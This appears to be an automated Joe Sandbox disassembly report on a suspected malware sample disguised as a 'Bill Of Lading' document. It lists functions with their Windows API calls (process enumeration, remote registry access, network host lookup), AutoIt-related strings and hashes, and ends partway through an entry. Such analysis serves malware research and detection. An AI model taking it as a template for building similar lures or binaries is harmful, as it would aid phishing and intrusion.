                                                                                                                        • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                      • _wcslen.LIBCMT ref: 004366DD
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                      • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                      • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                        • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 321622961-2967466578
                                                                                                                      • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                      • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                      • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                      • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                      Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                      • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                                                      • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                      • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                                      Function 0047439D Relevance: 12.3, APIs: 8, Instructions: 268COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8a5e7e2b220d2e4bb8ffc9ff05fb60d96dc8bc30e577e31ee69d5eb2f1750fd2
                                                                                                                      • Instruction ID: 650af14def374fe6fd11052fbef22cb8aa6c894e3601bf285572d08ae3c4fed9
                                                                                                                      • Opcode Fuzzy Hash: 8a5e7e2b220d2e4bb8ffc9ff05fb60d96dc8bc30e577e31ee69d5eb2f1750fd2
                                                                                                                      • Instruction Fuzzy Hash: 439192726043009BD710EF65DC82BABB3E9AFD4714F004D2EF548E7291D779E944875A
                                                                                                                      Function 00436EC8 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                                                                      • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                                                                      • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                                                                      • __wsplitpath.LIBCMT ref: 00436FA0
                                                                                                                      • _wcscat.LIBCMT ref: 00436FB2
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436FC4
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2903788889-0
                                                                                                                      • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                      • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                                                                      • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                      • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                                                                      Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                      • GetDC.USER32(00000000), ref: 00441585
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3864802216-0
                                                                                                                      • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                      • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                      • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                      • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                      Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00401257
                                                                                                                        • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                        • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                        • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                        • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                      • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1792922140-0
                                                                                                                      • Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                      • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                      • Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                      • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                                                      Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                      • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                      • __freefls@4.LIBCMT ref: 00414135
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1925773019-0
                                                                                                                      • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                      • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                      • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                      • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                      Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                      • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                      • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                      • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                      • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                      • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                      • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                      • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                      • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                      • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                      • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                      Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                                        • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                      • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                                      • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                                      • _memset.LIBCMT ref: 00464B92
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                      • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3424476444-0
                                                                                                                      • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                      • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                      • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                      • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                      Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-0
                                                                                                                      • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                      • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                      • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                      • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                      Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 535477410-0
                                                                                                                      • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                      • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                      • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                      • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                      Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • _memset.LIBCMT ref: 004538C4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                      • _wcslen.LIBCMT ref: 00453960
                                                                                                                      • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3530711334-4108050209
                                                                                                                      • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                      • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                      • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                      • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                      Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 3488606520-2761332787
                                                                                                                      • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                      • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                      • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                      • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                      Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
